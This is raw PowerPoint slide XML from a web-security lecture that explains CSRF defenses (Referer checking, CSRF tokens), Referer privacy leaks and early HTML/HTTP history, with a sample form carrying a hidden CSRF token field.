                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="18" dur="5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righ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right)">
                                      <p:cBhvr>
                                        <p:cTn id="27" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="51"/>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Mitigating CSRF Attacks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Two main types of defenses</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="769728" lvl="1" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Referer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> checking</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Leverages the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Referer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> HTTP header, which is automatically added to all requests by the browser</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Imperfect solution, may lead to false positives</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="769728" lvl="1" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>CSRF tokens</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Random tokens inserted into all forms by the server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>POSTed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> responses must include the corresponding random token</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="81512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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Referer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>” Header</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1825624"/>
            <a:ext cx="10515600" cy="4786669"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>HTTP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Referer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> header</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Sent automatically by the browser to indicate the origin of a request</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Example: if you click a link from Google Search…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="-83928" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Referer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://google.com/search?q=whatever</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="-83928" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1300" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Three possibilities in the previous CSRF example</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Referer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: https://www.bofw.com/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Referer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: http://evil.com/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Referer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Leveraging </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Referer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> to mitigate CSRF</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Strict: only accept POST if </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Referer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> is present </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>and</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> expected value</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Lenient: only accept POST if </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Referer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> is absent </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>or</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> expected value</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="919333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anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="1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anim calcmode="lin" valueType="num">
                                      <p:cBhvr>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anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="3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10" end="1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anim calcmode="lin" valueType="num">
                                      <p:cBhvr>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11" end="1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anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="40"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a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>1991: First version of Hypertext Markup Language (HTML) released by Sir Tim Berners-Lee</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Markup language for displaying documents</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Contained 18 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>tags</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, including anchor (&lt;a&gt;) a.k.a. a hyperlink</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>1991: First version of Hypertext Transfer Protocol (HTTP) is published</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Berners-Lee’s original protocol only included GET requests for HTML</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>HTTP is more general, many request (e.g., PUT) and document types</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="28204266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Referer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Privacy</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1825624"/>
            <a:ext cx="10515600" cy="4886195"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Referer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> header can leak information from your browser to a website</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Imagine seeing an access log entry for a celebrity's Wikipedia entry where...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Referer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://int.cia.gov/projects/hitlist.html</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Common sources of blocking</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>HTTP proxy at network perimeter</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>HTTPS → HTTP transitions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>User blocking</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Referer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> to mitigate CSRF may lead to false positives</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Angry users, lost revenue</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="137206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anim calcmode="lin" valueType="num">
                                      <p:cBhvr>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anim calcmode="lin" valueType="num">
                                      <p:cBhvr>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anim calcmode="lin" valueType="num">
                                      <p:cBhvr>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anim calcmode="lin" valueType="num">
                                      <p:cBhvr>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CSRF Tokens</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" defTabSz="4572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lang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="35A327"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>&lt;form</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A09F25"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>action=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D7391E"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>"/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D7391E"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>xfer.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D7391E"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="35A327"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="3E3E3E"/>
              </a:solidFill>
              <a:latin typeface="Menlo"/>
              <a:ea typeface="Menlo"/>
              <a:cs typeface="Menlo"/>
              <a:sym typeface="Menlo"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" defTabSz="4572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lang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>    // ...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" defTabSz="4572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lang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="35A327"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>&lt;input</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A09F25"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>type=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D7391E"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>"hidden“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A09F25"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>name=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D7391E"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>"CSRF_TOKEN“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A09F25"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>value=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D7391E"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>"Ko7bgbjYr2+nqO7J7zIKbQ=="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="35A327"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="3E3E3E"/>
              </a:solidFill>
              <a:latin typeface="Menlo"/>
              <a:ea typeface="Menlo"/>
              <a:cs typeface="Menlo"/>
              <a:sym typeface="Menlo"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" defTabSz="4572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lang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="35A327"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>&lt;/form&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="3E3E3E"/>
              </a:solidFill>
              <a:latin typeface="Menlo"/>
              <a:ea typeface="Menlo"/>
              <a:cs typeface="Menlo"/>
              <a:sym typeface="Menlo"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Require </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>POSTed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> responses to include a secret value</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Unguessability</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> implies </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>unforgeability</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>SOP prevents attacker from downloading the target form using code in your browser</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Attacker can't feasibly predict correct value</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Con: requires rewriting app in most cases</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Pro: Many web frameworks include CSRF token modules</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Proxy could also be used to insert and check tokens</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1236857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CSRF </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Wrapup</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Mitigation requires a one-step, side-effecting action</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Attacks are blind</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>e.g., POST /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>important_action</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>CSRF is the dual of XSS is some ways</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In XSS, client trust in the server is violated</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In CSRF, server trust in the client is violated</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A classic example of a confused deputy attack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The app is tricked into doing something it shouldn't do, even though it possesses the authority to do so</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3857665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Evolution of HTTP</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1828801" y="2743200"/>
            <a:ext cx="9497484" cy="2672522"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t>HTTP 2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
